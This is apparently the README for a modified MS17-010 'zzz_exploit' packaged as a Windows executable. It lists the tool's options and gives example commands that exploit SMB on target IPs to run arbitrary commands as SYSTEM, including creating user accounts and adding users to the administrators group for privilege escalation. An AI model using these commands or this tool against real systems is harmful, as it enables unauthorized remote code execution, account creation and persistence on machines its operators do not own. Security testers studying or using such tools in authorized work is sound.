This is a modified version of the Worawit Wang: GitHub zzz_exploit for MS17-010.
It implements a few options such as username/password specification and an arbitrary command to be executed.
It does not change anything related to the SMB exploitation
This is a bundle with an executable and dependencies and DOES NOT require python install.
Built with Pyinstaller.
Unzip the bundle and from the command line execute ms17-010-zzz.exe
ms17-010-zzz.exe -h
usage: ms17-010-zzz.exe [-h] -t TARGET -c COMMAND -P PIPE [-u USER]
[-p PASSWORD]
MS17-010 - zzz_explot modified and converted to binary https://github.com/irgoncalves/ms17-010
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target for exploitation
-c COMMAND, --command COMMAND
Command to be executed as a service
-P PIPE, --pipe PIPE Pipe to connect (e.g. netlogon)
-u USER, --user USER Username to authenticate in case no anomymous
connection to a pipe is allowed
-p PASSWORD, --password PASSWORD
Password for the user
Example: ms17-010.exe -t 172.16.0.2 -c 'net user /add testusr teste123'
Example to add a user remotely connecting anonymously to a named pipe:
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123"
Example to add a user remotely specifying a named pipe and a valid non-administrator user:
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123" -P netlogon -u svruser -p abc123
Example to locally escalate privilege for an existent user (all commands are executed by SYSTEM):
ms17-010-zzz.exe -t 127.0.0.1 -c "net localgroup administrators teste2 /add" -P netlogon -u teste2 -p teste2123
Currently supports only x64 platform (Tested running from Windows 10, 2K8)